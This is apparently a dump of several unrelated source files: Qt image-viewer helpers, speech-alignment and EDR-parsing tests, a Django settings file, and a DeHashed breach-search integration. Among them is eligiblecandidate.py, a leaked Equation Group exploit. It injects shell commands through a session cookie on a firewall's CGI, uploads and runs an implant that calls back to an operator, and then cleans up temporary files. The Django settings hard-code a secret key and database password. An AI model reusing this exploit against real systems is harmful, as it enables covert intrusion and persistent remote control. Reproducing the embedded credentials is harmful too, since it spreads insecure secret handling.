# Special handling for wildcard or extension.
# This is similar to open_files() in FBrowser plugin.
if '*' in filename or '[' in filename:
info = iohelper.get_fileinfo(filename)
ext = iohelper.get_hdu_suffix(info.numhdu)
files = glob.glob(info.filepath) # Expand wildcard
paths = ['{0}{1}'.format(f, ext) for f in files]
# NOTE: Using drag-drop callback here might give QPainter
# warnings.
for path in paths:
self.cb(path)
# Normal load
else:
self.cb(filename)
class DirectorySelection(object):
"""Handle directory selection dialog."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None):
"""Let user select a directory.
Parameters
----------
title : str
Title for the dialog.
callfn : func
Function used to handle selected directory.
initialdir : str or `None`
Directory for dialog.
"""
self.cb = callfn
dirname = QtGui.QFileDialog.getExistingDirectory(
self.parent, title, initialdir)
if dirname:
self.cb(dirname)
class Timer(object):
"""Abstraction of a GUI-toolkit implemented timer."""
def __init__(self, ival_sec, expire_cb, data=None):
"""Create a timer set to expire after `ival_sec` and which will
call the callable `expire_cb` when it expires.
"""
self.ival_sec = ival_sec
self.data = data
self.timer = QtCore.QTimer()
self.timer.setSingleShot(True)
self.timer.timeout.connect(lambda: expire_cb(self))
def start(self, ival_sec=None):
"""Start the timer. If `ival_sec` is not None, it should
specify the time to expiration in seconds.
"""
if ival_sec is None:
ival_sec = self.ival_sec
# QTimer set in milliseconds
ms = int(ival_sec * 1000.0)
self.timer.start(ms)
def set(self, time_sec):
self.start(ival_sec=time_sec)
def cancel(self):
"""Cancel this timer. If the timer is not running, there
is no error.
"""
try:
self.timer.stop()
except:
pass
clear = cancel
def cmap2pixmap(cmap, steps=50):
"""Convert a Ginga colormap into a QPixmap
"""
inds = numpy.linspace(0, 1, steps)
n = len(cmap.clst) - 1
tups = [ cmap.clst[int(x*n)] for x in inds ]
rgbas = [QColor(int(r * 255), int(g * 255),
int(b * 255), 255).rgba() for r, g, b in tups]
im = QImage(steps, 1, QImage.Format_Indexed8)
im.setColorTable(rgbas)
for i in range(steps):
im.setPixel(i, 0, i)
im = im.scaled(128, 32)
pm = QPixmap.fromImage(im)
return pm
def get_scroll_info(event):
"""
Returns the (degrees, direction) of a scroll motion Qt event.
"""
# 15 deg is standard 1-click turn for a wheel mouse
# delta() usually returns 120
if have_pyqt5:
# TODO: use pixelDelta() for better handling on hi-res devices
point = event.angleDelta()
dx, dy = point.x(), point.y()
delta = math.sqrt(dx ** 2 + dy ** 2)
if dy < 0:
delta = -delta
ang_rad = math.atan2(dy, dx)
direction = math.degrees(ang_rad) - 90.0
direction = math.fmod(direction + 360.0, 360.0)
else:
delta = event.delta()
orientation = event.orientation()
direction = None
if orientation == QtCore.Qt.Horizontal:
if delta > 0:
direction = 270.0
elif delta < 0:
direction = 90.0
else:
if delta > 0:
direction = 0.0
elif delta < 0:
direction = 180.0
num_degrees = abs(delta) / 8.0
return (num_degrees, direction)
def get_icon(iconpath, size=None):
image = QImage(iconpath)
if size is not None:
qsize = QtCore.QSize(*size)
image = image.scaled(qsize)
pixmap = QPixmap.fromImage(image)
iconw = QIcon(pixmap)
return iconw
def get_font(font_family, point_size):
font = QFont(font_family, point_size)
return font
#END
|
bsd-3-clause
| 8,053,044,321,151,345,000
| 25.837278
| 113
| 0.584169
| false
| 3.675446
| false
| false
| false
|
meyersbs/misc_nlp_scripts
|
Prosodylab-Aligner-master/eval.py
|
1
|
2762
|
#!/usr/bin/env python3
# eval.py: intrinsic evaluation for forced alignment using Praat TextGrids
# Kyle Gorman <gormanky@ohsu.edu>
from __future__ import division
from aligner import TextGrid
from sys import argv, stderr
from collections import namedtuple
from argparse import ArgumentParser
CLOSE_ENOUGH = 20
TIER_NAME = "phones"
boundary = namedtuple("boundary", ["transition", "time"])
def boundaries(textgrid, tier_name):
"""
Extract a single tier named `tier_name` from the TextGrid object
`textgrid`, and then convert that IntervalTier to a list of boundaries
"""
tiers = textgrid.getList(tier_name)
if not tiers:
exit('TextGrid has no "{}" tier.'.format(tier_name))
if len(tiers) > 1:
exit('TextGrid has many "{}" tiers.'.format(tier_name))
tier = tiers[0]
boundaries = []
for (interval1, interval2) in zip(tier, tier[1:]):
boundaries.append(boundary('"{}"+"{}"'.format(interval1.mark,
interval2.mark),
interval1.maxTime))
return boundaries
def is_close_enough(tx, ty, close_enough):
"""
Return True iff `tx` and `ty` are within `close_enough` of each other
"""
return abs(tx - ty) < close_enough
if __name__ == "__main__":
# check args
tier_name = TIER_NAME
close_enough = CLOSE_ENOUGH / 1000
argparser = ArgumentParser(description="Alignment quality evaluation")
argparser.add_argument("-f", "--fudge", type=int,
help="Fudge factor in milliseconds")
argparser.add_argument("-t", "--tier",
help="Name of tier to use")
argparser.add_argument("OneGrid")
argparser.add_argument("TwoGrid")
args = argparser.parse_args()
if args.fudge:
close_enough = args.fudge / 1000
if args.tier:
tier_name = args.tier
# read in
first = boundaries(TextGrid.fromFile(args.OneGrid), tier_name)
secnd = boundaries(TextGrid.fromFile(args.TwoGrid), tier_name)
# count concordant and discordant boundaries
if len(first) != len(secnd):
exit("Tiers lengths do not match.")
concordant = 0
discordant = 0
for (boundary1, boundary2) in zip(first, secnd):
if boundary1.transition != boundary2.transition:
exit("Tier labels do not match.")
if is_close_enough(boundary1.time, boundary2.time, close_enough):
concordant += 1
else:
discordant += 1
# print out
agreement = concordant / (concordant + discordant)
print("{} 'close enough' boundaries.".format(concordant))
print("{} incorrect boundaries.".format(discordant))
print("Agreement: {:.4f}".format(agreement))
|
mit
| 5,643,734,626,767,116,000
| 32.682927
| 75
| 0.625272
| false
| 3.742547
| false
| false
| false
|
jbarnoud/panedr
|
tests/test_edr.py
|
1
|
8096
|
#-*- coding: utf-8 -*-
"""
Tests for panedr
"""
from __future__ import print_function, division
import six
import os
import sys
import unittest
import pytest
import contextlib
import numpy
import pandas
import panedr
import re
# On python 2, cStringIO is a faster version of StringIO. It may not be
# available on implementations other than CPython, though. Therefore, we may
# have to fall back on StringIO if cStringIO is not available.
# On python 3, the StringIO object is not part of the StringIO module anymore.
# It becomes part of the io module.
try:
from cStringIO import StringIO
except ImportError:
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from collections import namedtuple
try:
from pathlib import Path
except ImportError:
# Python 2 requires the pathlib2 backport of pathlib
from pathlib2 import Path
# Constants for XVG parsing
COMMENT_PATTERN = re.compile(r'\s*[@#%&/]')
LEGEND_PATTERN = re.compile(r'@\s+s\d+\s+legend\s+"(.*)"')
NDEC_PATTERN = re.compile(r'[\.eE]')
# Data constants
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
EDR = os.path.join(DATA_DIR, 'cat.edr')
EDR_XVG = os.path.join(DATA_DIR, 'cat.xvg') # All EDR fields read with
# ``gmx energy``
EDR_IRREGULAR = os.path.join(DATA_DIR, 'irregular.edr')
EDR_IRREGULAR_XVG = os.path.join(DATA_DIR, 'irregular.xvg')
EDR_DOUBLE = os.path.join(DATA_DIR, 'double.edr')
EDR_DOUBLE_XVG = os.path.join(DATA_DIR, 'double.xvg')
EDR_BLOCKS = os.path.join(DATA_DIR, 'blocks.edr')
EDR_BLOCKS_XVG = os.path.join(DATA_DIR, 'blocks.xvg')
EDR_Data = namedtuple('EDR_Data', ['df', 'xvgdata', 'xvgtime', 'xvgnames',
'xvgprec', 'edrfile', 'xvgfile'])
@pytest.fixture(scope='module',
params=[(EDR, EDR_XVG),
(EDR_IRREGULAR, EDR_IRREGULAR_XVG),
(EDR_DOUBLE, EDR_DOUBLE_XVG),
(EDR_BLOCKS, EDR_BLOCKS_XVG),
(Path(EDR), EDR_XVG),
])
def edr(request):
edrfile, xvgfile = request.param
df = panedr.edr_to_df(edrfile)
xvgdata, xvgnames, xvgprec = read_xvg(xvgfile)
xvgtime = xvgdata[:, 0]
xvgdata = xvgdata[:, 1:]
return EDR_Data(df, xvgdata, xvgtime, xvgnames, xvgprec, edrfile, xvgfile)
class TestEdrToDf(object):
"""
Tests for :fun:`panedr.edr_to_df`.
"""
def test_output_type(self, edr):
"""
Test that the function returns a pandas DataFrame.
"""
assert isinstance(edr.df, pandas.DataFrame)
def test_columns(self, edr):
"""
Test that the column names and order match.
"""
ref_columns = numpy.insert(edr.xvgnames, 0, u'Time')
columns = edr.df.columns.values
if columns.shape[0] == ref_columns.shape[0]:
print('These columns differ from the reference (displayed as read):')
print(columns[ref_columns != columns])
print('The corresponding names displayed as reference:')
print(ref_columns[ref_columns != columns])
assert ref_columns.shape == columns.shape, \
'The number of columns read is unexpected.'
assert numpy.all(ref_columns == columns), \
'At least one column name was misread.'
def test_times(self, edr):
"""
Test that the time is read correctly when dt is regular.
"""
time = edr.df[u'Time'].values
assert numpy.allclose(edr.xvgtime, time, atol=5e-7)
def test_content(self, edr):
"""
Test that the content of the DataFrame is the expected one.
"""
content = edr.df.iloc[:, 1:].values
print(edr.xvgdata - content)
assert numpy.allclose(edr.xvgdata, content, atol=edr.xvgprec/2)
def test_verbosity(self):
"""
Make sure the verbose mode does not alter the results.
"""
with redirect_stderr(sys.stdout):
df = panedr.edr_to_df(EDR, verbose=True)
ref_content, _, prec = read_xvg(EDR_XVG)
content = df.values
print(ref_content - content)
assert numpy.allclose(ref_content, content, atol=prec/2)
def test_progress(self):
"""
Test the progress meter displays what is expected.
"""
output = StringIO()
with redirect_stderr(output):
df = panedr.edr_to_df(EDR, verbose=True)
progress = output.getvalue().split('\n')[0].split('\r')
print(progress)
dt = 2000.0
# We can already iterate on `progress`, but I want to keep the cursor
# position from one for loop to the other.
progress_iter = iter(progress)
assert '' == next(progress_iter)
self._assert_progress_range(progress_iter, dt, 0, 21, 1)
self._assert_progress_range(progress_iter, dt, 30, 201, 10)
self._assert_progress_range(progress_iter, dt, 300, 2001, 100)
self._assert_progress_range(progress_iter, dt, 3000, 14101, 1000)
# Check the last line
print(df.iloc[-1, 0])
ref_line = 'Last Frame read : 14099, time : 28198000.0 ps'
last_line = next(progress_iter)
assert ref_line == last_line
# Did we leave stderr clean with a nice new line at the end?
assert output.getvalue().endswith('\n'), \
'New line missing at the end of output.'
def _assert_progress_range(self, progress, dt, start, stop, step):
for frame_idx in range(start, stop, step):
ref_line = 'Read frame : {}, time : {} ps'.format(frame_idx,
dt * frame_idx)
progress_line = next(progress)
print(frame_idx, progress_line)
assert ref_line == progress_line
def read_xvg(path):
"""
Reads XVG file, returning the data, names, and precision.
The data is returned as a 2D numpy array. Column names are returned as an
array of string objects. Precision is an integer corresponding to the least
number of decimal places found, excluding the first (time) column.
    The XVG file type is assumed to be 'xy' or 'nxy'. The function also assumes
    that there is only one series in the file (no data after // if // is
    present). If more than one series is present, they will be concatenated if
    the number of columns is consistent; if the number of columns is not
    consistent among the series, then the function will crash.
"""
data = []
names = []
prec = -1
with open(path) as infile:
for line in infile:
if not re.match(COMMENT_PATTERN, line):
data.append(line.split())
precs = [ndec(val) for val in data[-1][1:]]
if prec == -1:
prec = min(precs)
else:
prec = min(prec, *precs)
continue
match = re.match(LEGEND_PATTERN, line)
if match:
names.append(six.text_type(match.groups()[0]))
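    # Convert the minimum number of decimal places into an absolute precision value.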
if prec <= 0:
prec = 1.
else:
prec = 10**(-prec)
return (numpy.array(data, dtype=float),
numpy.array(names, dtype=object),
prec)
def ndec(val):
"""Returns the number of decimal places of a string rep of a float
"""
try:
return len(re.split(NDEC_PATTERN, val)[1])
except IndexError:
return 0
@contextlib.contextmanager
def redirect_stderr(target):
"""
    Redirect sys.stderr to another object.
    This function is aimed to be used as a context manager. It is useful
    especially to redirect stderr to stdout as stdout gets captured by nose
while stderr is not. stderr can also get redirected to any other object
that may act on it, such as a StringIO to inspect its content.
"""
stderr = sys.stderr
try:
sys.stderr = target
yield
finally:
sys.stderr = stderr
if __name__ == '__main__':
unittest.main()
|
lgpl-2.1
| 5,920,553,386,538,837,000
| 33.451064
| 81
| 0.600173
| false
| 3.693431
| true
| false
| false
|
whereaswhile/DLSR
|
common/SimPrvd.py
|
1
|
2133
|
#simulated regression data provider
import os
import sys
import numpy as np
import scipy.misc
import glob
sys.path.append("../convnet-folk_master")
from w_util import readLines
# define default parameters
IN_DATA_SIZE=[5, 5, 1]
OUT_DATA_SIZE=[16, 1]
DATA_NUM=1
class SimSet:
def __init__(self, paramfile):
print "SimPrvd: parsing", paramfile
plines = readLines(paramfile)
self.param = {'paramfile': paramfile, 'filtype': 'avg'}
for l in plines:
l=l.rstrip().split()
self.param[l[0]]=l[1]
print self.param
self.indim=1
for s in IN_DATA_SIZE:
self.indim*=s
self.outdim=1
for s in OUT_DATA_SIZE:
self.outdim*=s
# draw data
self.input=[]
self.output=[]
if self.param['filtype'][-4:]=='.fil': #load filter from file
fil=np.loadtxt(self.param['filtype'])
fil=np.reshape(fil, IN_DATA_SIZE)
for i in range(DATA_NUM):
if DATA_NUM==1:
m=np.ones(IN_DATA_SIZE)
else:
m=np.random.random(IN_DATA_SIZE) #random
self.input+=[m]
mm=np.zeros(OUT_DATA_SIZE)
if self.param['filtype']=='avg':
mm[0, 0]=np.mean(m)
else:
mm[0, 0]=np.sum(m*fil)
self.output+=[mm]
def get_num_images(self):
return DATA_NUM
#def get_num_classes(self):
# return 0
def get_input_dim(self):
return self.indim
def get_output_dim(self):
return self.outdim
def get_input(self, idx):
return self.input[idx]
def get_output(self, idx):
return self.output[idx]
def getmeta(self, idx):
return self.param
def getStore(param):
return SimSet(param)
def test(param):
ts = SimSet(param)
print "{} images, {} classes".format(ts.get_num_images(), ts.get_num_classes())
for i in range(0,20,10):
im=ts.get_input(i)
y=ts.get_output(i)
meta=ts.getmeta(i)
print "i={}, input={},\toutput={}".format(i, im, y)
print 'image shape:', np.shape(im)
print 'meta', meta
if __name__ == '__main__':
print 'testing SimPrvd.py!'
assert(len(sys.argv)==2)
test(sys.argv[1])
|
gpl-2.0
| 8,928,693,029,719,009,000
| 21.452632
| 83
| 0.592124
| false
| 2.938017
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/ELCA/eligiblecandidate.py
|
1
|
5274
|
#!/usr/bin/env python2.7
import sys
import tarfile
from time import ctime,sleep
from StringIO import StringIO
from fosho import HTTPSExploit,run_exploit,randstr
from fosho.requests.exceptions import *
class ELCAExploit(HTTPSExploit):
name = "ELIGIBLECANDIDATE"
version = "v1.1.0.1"
desc="What is the sound of a single thread blocking?"
modes = ["nopen"]
exploit_url= "/cgi/maincgi.cgi"
target_url= "/site/image/white.gif"
stagerfn = "stage/stager.sh"
tinyexec = "stage/tiny-exec/tiny-exec"
setlog = "stage/setlog/setlog"
required_exploit = HTTPSExploit.required_exploit+["cid"]
required_probe = ["cid"]
required_survey = ["cid"]
required_clean = ["cid"]
timeout = 120
cfg = "ELCA.cfg"
@classmethod
def add_args(cur,cls):
parser,subparsers = HTTPSExploit.add_args(cls)
egroup = parser.add_argument_group("%s Options" %
cls.name)
egroup.add_argument("--cid",type=str,help="Name of session ID in cookie (default: auto)")
return parser,subparsers
def touch(self,resp=None):
if not resp:
resp = self.head(self.target_url)
if 'etag' in resp.headers:
etag,date = self._parse_etag(resp.headers['etag'])
##
self.log.info("Etag - %s; Last modified - %s" % (etag,date))
def probe(self):
target = "/site/pages/index.html"
self.log.info("Checking current %s etag" % target)
old = self.get_etag(target)
##
sleep(1)
self.log.info("Running touch on %s" % target)
self._run_cmd("touch /w*/*/*/p*/*")
self.log.info("Checking etag again to confirm")
new = self.get_etag(target)
if new[0] == old[0]:
return "Unable to touch %s" % target
def exploit(self):
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._upload_run()
def clean(self):
''''''
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._run_cmd("rm -f /t*/.a")
self._run_cmd("rm -f /t*/.te*")
def build_nopen_exploit_payload(self):
##
cmd = "./htttpd %s D=-c%s tos_configd &" % ("./httpd",self.ns.callback)
self.build_exploit_payload(cmd)
def build_exploit_payload(self,cmd="/tmp/httpd"):
##
out = StringIO()
tf = tarfile.open(mode="w:gz",fileobj=out)
##
tf.dereference = True
try:
tf.add(self.tinyexec,arcname='htttpd')
tf.add(self.binpath,arcname='httpd')
tf.add(self.setlog,arcname='httppd')
##
except IOError, e:
self.log.error("Couldn't find file. Ensure paths are correct and you have run make.")
raise e
tf.close()
out.seek(0)
tdata = out.read()
self.folder = randstr(5)
stager = ""
for i,l in enumerate(open(self.stagerfn).readlines()):
if i == 0 or not l.strip().startswith("#"):
stager+=l
##
##
flen = len(stager.format(rand=self.folder,flen=len(stager),cmd=cmd))
self.payload = stager.format(rand=self.folder,flen=flen,cmd=cmd)
self.payload += tdata
def _get_cid(self):
''''''
if self.cid:
self.log.info("Already know cookie id: %s" % self.cid)
return self.cid
try:
cid = self.get(self.exploit_url).cookies.keys()[0]
self.log.info("Detected cookie id: %s" % cid)
return cid
except IndexError:
self.log.warning("Could not reliably detect cookie. Using 'session_id'...")
return "session_id"
def _upload_run(self):
self.log.info("Uploading and moving file...")
p = StringIO(self.payload)
if not self.cid:
self._get_cid()
self.post(self.exploit_url,cookies={self.cid:"x`cp /t*/cg* /tmp/.a`"},
files={randstr(5):p})
self.log.info("Making file executable...")
self._run_cmd("chmod +x /tmp/.a")
self.log.info("Running payload...")
try:
self._run_cmd("/tmp/.a",quiet=True)
except KeyboardInterrupt:
self.log.info("Closed manually by user. Exiting...")
except Timeout:
self.log.info("Connection timed out. Only a problem if the callback was not received.")
def _run_cmd(self,cmd,quiet=False,raw=False):
if quiet:
cmd = "%s 2>&1" % cmd
if not raw:
cmd = "x`%s`" % cmd
if len(cmd) > 24:
self.log.warning("Command is longer than 24 bytes: %s" % cmd)
self.continue_prompt("Are you sure you want to run this? (y/N) ")
if not self.cid:
self._get_cid()
self.log.debug("Running command on target: %s" % cmd)
return self.get(self.exploit_url,cookies={self.cid:cmd})
def _parse_etag(self,etag):
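        # The last dash-separated field of the etag is parsed as a hex-encoded
        # Unix timestamp (last-modified time).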
etag = etag.split("/")[-1].strip('"')
date = ctime(int(etag.split("-")[-1],16))
return etag,date
def main():
run_exploit(ELCAExploit)
if __name__=="__main__":
main()
|
unlicense
| 518,061,169,539,913,150
| 29.485549
| 99
| 0.546454
| false
| 3.43807
| false
| false
| false
|
zaibacu/wutu
|
wutu/app.py
|
1
|
1626
|
import sys
import jinja2
from flask import Flask, render_template, Response
from flask_restful import Api
from functools import lru_cache
from wutu.util import *
from wutu.compiler.common import create_base, create_stream, get_data
class CustomFlask(Flask):
"""
Enchanted Flask module
"""
jinja_options = Flask.jinja_options.copy()
jinja_options.update(dict(
variable_start_string='{<',
variable_end_string='>}',
))
def create(index="index.html", ngmodules=None, minify=True, locator=current):
"""
Creates wutu app
:param index: html file for index page
:param minify: Do we want to minify generated JavaScripts (should be False for debug purposes)
:param locator: function which tells where to find templates
:return:
"""
app = CustomFlask(__name__)
api = Api(app)
app.jinja_loader = jinja2.FileSystemLoader(locator())
api.jsstream = create_stream()
create_base(api.jsstream, ngmodules)
@app.route("/")
def index_page():
"""
Endpoint for base page
:return:
"""
try:
return render_template(index)
except IOError:
return "Failed to render template {0}, error: Not found".format(index)
@lru_cache()
@app.route("/wutu.js")
def wutu_js():
if minify:
from jsmin import jsmin
jsdata = jsmin(get_data(api.jsstream))
else:
from jsbeautifier import beautify
jsdata = beautify(get_data(api.jsstream))
return Response(jsdata, mimetype="text/javascript")
app.api = api
return app
|
mit
| 2,517,502,439,025,025,000
| 26.559322
| 98
| 0.630996
| false
| 3.799065
| false
| false
| false
|
zhangyage/Python-oldboy
|
day11/day11_Django/day11_Django/settings.py
|
1
|
2738
|
# -*- coding:utf-8 -*-
"""
Django settings for day11_Django project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'f4#sx65y-0@=d4js9qnq#0b-wnh-r$w2xsf^*ek9@@1*%lzk()'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# Directory where our template files are stored; note the trailing comma in the tuple below, it is required
TEMPLATE_DIRS = (
os.path.join(BASE_DIR,'template'),
)
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'web',
    # Our own app has to be registered here
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
    # Commenting out the line above works around the CSRF (cross-site request forgery) issue we hit when using Django
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'day11_Django.urls'
WSGI_APPLICATION = 'day11_Django.wsgi.application'
# MySQL connection settings
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'day11',
'USER':'zhangyage',
'PASSWORD':'zhangyage',
'HOST':'192.168.75.133',
'PORT':'3306',
}
}
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
# Path where static files are stored
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR,'static'),
)
|
apache-2.0
| -3,399,185,197,010,899,500
| 22.925926
| 71
| 0.68808
| false
| 2.833333
| false
| false
| false
|
demisto/content
|
Packs/DeHashed/Integrations/DeHashed/DeHashed.py
|
1
|
11742
|
from typing import Union, Dict, Optional, List
from CommonServerPython import * # noqa: E402 lgtm [py/polluting-import]
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
INTEGRATION_CONTEXT_BRAND = "DeHashed"
BASE_URL = "https://api.dehashed.com/"
RESULTS_FROM = 1
RESULTS_TO = 50
class Client(BaseClient):
def __init__(
self,
base_url,
verify=True,
proxy=False,
ok_codes=None,
headers=None,
auth=None,
email=None,
api_key=None,
email_dbot_score='SUSPICIOUS'
):
super().__init__(
base_url,
verify=verify,
proxy=proxy,
ok_codes=ok_codes,
headers=headers,
auth=auth,
)
self.email = email
self.api_key = api_key
self.email_dbot_score = email_dbot_score
def dehashed_search(self, asset_type: Optional[str], value: List[str], operation: Optional[str],
results_page_number: Optional[int] = None) -> dict:
"""
        this function gets query parameters from demisto and performs a "GET" request to Dehashed api
:param asset_type: email, ip_address, username, hashed_password, name, vin, address, phone,all_fields.
:param value: value to search
:param operation: choose a search type to perform.
:param results_page_number: a page number to get. every page contains 5,000 entries.
:return: a dictionary containing: a list of entries that match the query, number of total results exits for the
given query, request status, how much time the request took, and balance.
"""
if not value:
raise DemistoException('This command must get "value" as argument')
query_value = ""
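        # Build the query value: 'is' quotes each term for an exact match,
        # 'contains' OR-joins multiple terms, and 'regex' wraps terms in slashes.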
if len(value) > 1:
if operation == "is":
query_value = " ".join((f'"{value}"' for value in value))
elif operation == "contains":
query_value = " OR ".join(value)
query_value = f"({query_value})"
elif operation == "regex":
query_value = " ".join((f"/{value}/" for value in value))
else:
if operation == "is":
query_value = f'"{value[0]}"'
elif operation == "contains":
query_value = value[0]
elif operation == 'regex':
query_value = f"/{value[0]}/"
if asset_type == "all_fields":
query_string = f"{query_value}"
else:
query_string = f"{asset_type}:{query_value}"
if results_page_number:
return self._http_request(
"GET",
"search",
params={"query": query_string, "page": results_page_number},
auth=(self.email, self.api_key),
timeout=25,
)
else:
return self._http_request(
"GET",
"search",
params={"query": query_string},
auth=(self.email, self.api_key),
timeout=25
)
def test_module(client: Client) -> str:
"""
Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful.
Args:
client: DeHashed client
Returns:
'ok' if test passed, anything else will fail the test.
"""
result = client.dehashed_search(
asset_type="vin", value=["test", "test1"], operation="is"
)
if isinstance(result, dict):
return "ok"
else:
return f"Test failed because got unexpected response from api: {result}"
def validate_filter_parameters(results_from_value, results_to_value):
if results_to_value <= 0:
raise DemistoException(f'Argument "results_to" expected to be greater than zero, but given:'
f' {results_to_value}')
elif results_from_value <= 0:
raise DemistoException(f'Argument "results_from" expected to be greater than zero, but given:'
f' {results_from_value}')
elif results_to_value > results_from_value:
raise DemistoException('Argument "results_to" expected to be less than or equal to "results_from"')
def filter_results(
entries: list, results_from: Union[int, None], results_to: Union[int, None]
) -> tuple:
"""
    gets raw results returned from the api and limits the number of entries to return to demisto
:param entries: search results of the performed query
:param results_from: start range
:param results_to: end range
:return: filtered results
"""
if not results_from:
results_from = RESULTS_FROM
if not results_to:
results_to = RESULTS_TO
if results_to > len(entries):
results_to = len(entries)
validate_filter_parameters(results_to, results_from)
return entries[results_from - 1:results_to], results_from, results_to
def arg_to_int(arg_val: Optional[str], arg_name: Optional[str]) -> Optional[int]:
"""
converts commands arguments to integers
:param arg_name: argument name
:param arg_val: value to convert to int
:return: converted argument as int
"""
if arg_val is None:
return None
if not isinstance(arg_val, str):
return None
try:
result = int(arg_val)
if result <= 0:
raise DemistoException(f'"{arg_name}" expected to be greater than zero.')
return result
except ValueError:
raise DemistoException(
f'"{arg_name}" expected to be Integer. passed {arg_val} instead.'
)
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': dbot_score
}
def dehashed_search_command(client: Client, args: Dict[str, str]) -> tuple:
"""
    this command returns data regarding compromised assets given as arguments
:param client: Demisto client
:param args:
- asset_type: email, ip_address, username, hashed_password, name, vin, address, phone,all_fields.
- value: value to search
- operation: choose a search type to perform.
- results_page_number: a page number to get. every page contains 5,000 entries.
- results_from: sets result's start range
- results_to: sets result's end range
:return: Demisto outputs
"""
asset_type = args.get("asset_type")
operation = args.get("operation")
value = argToList(args.get("value"))
results_page_number = arg_to_int(args.get("page"), "page")
results_from = arg_to_int(args.get("results_from"), "results_from")
results_to = arg_to_int(args.get("results_to"), "results_to")
result = client.dehashed_search(asset_type, value, operation, results_page_number)
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
return "No matching results found", None, None
else:
filtered_results, results_from, results_to = filter_results(
query_data, results_from, results_to
)
query_entries = createContext(
filtered_results, keyTransform=underscoreToCamelCase
)
headers = [key.replace("_", " ") for key in [*filtered_results[0].keys()]]
if not results_page_number:
results_page_number = 1
last_query = {
"ResultsFrom": results_from,
"ResultsTo": results_to,
"DisplayedResults": len(filtered_results),
"TotalResults": result.get("total"),
"PageNumber": results_page_number
}
return (
tableToMarkdown(
f'DeHashed Search - got total results: {result.get("total")}, page number: {results_page_number}'
f', page size is: {len(filtered_results)}. returning results from {results_from} to {results_to}.',
filtered_results,
headers=headers,
headerTransform=pascalToSpace,
),
{
f"{INTEGRATION_CONTEXT_BRAND}.LastQuery(true)": last_query,
f"{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)": query_entries,
},
filtered_results,
)
def email_command(client: Client, args: Dict[str, str]) -> tuple:
"""
This command returns data regarding a compromised email address
:param client: Demisto client
:param args:
- email: the email address that should be checked
:return: Demisto outputs
"""
email_address = argToList(args.get('email'))
result = client.dehashed_search('email', email_address, 'contains')
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
context = {
'DBotScore':
{
'Indicator': email_address[0],
'Type': 'email',
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': 0
}
}
return "No matching results found", context, None
else:
default_dbot_score_email = 2 if client.email_dbot_score == 'SUSPICIOUS' else 3
query_entries = createContext(query_data, keyTransform=underscoreToCamelCase)
sources = [entry.get('obtained_from') for entry in query_data if entry.get('obtained_from')]
headers = [key.replace("_", " ") for key in [*query_data[0].keys()]]
hr = tableToMarkdown(f'DeHashed Search - got total results: {result.get("total")}', query_data, headers=headers,
headerTransform=pascalToSpace)
dbot_score = default_dbot_score_email if len(sources) > 0 else 0
context = {
f'{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)': query_entries,
'DBotScore': create_dbot_score_dictionary(email_address[0], 'email', dbot_score)
}
return hr, context, query_data
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
email = demisto.params().get("credentials", {}).get('identifier', '')
api_key = demisto.params().get("credentials", {}).get('password', '')
base_url = BASE_URL
verify_certificate = not demisto.params().get("insecure", False)
proxy = demisto.params().get("proxy", False)
email_dbot_score = demisto.params().get('email_dbot_score', 'SUSPICIOUS')
LOG(f"Command being called is {demisto.command()}")
try:
client = Client(
base_url,
verify=verify_certificate,
email=email,
api_key=api_key,
proxy=proxy,
headers={"accept": "application/json"},
email_dbot_score=email_dbot_score
)
if demisto.command() == "test-module":
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif demisto.command() == "dehashed-search":
return_outputs(*dehashed_search_command(client, demisto.args()))
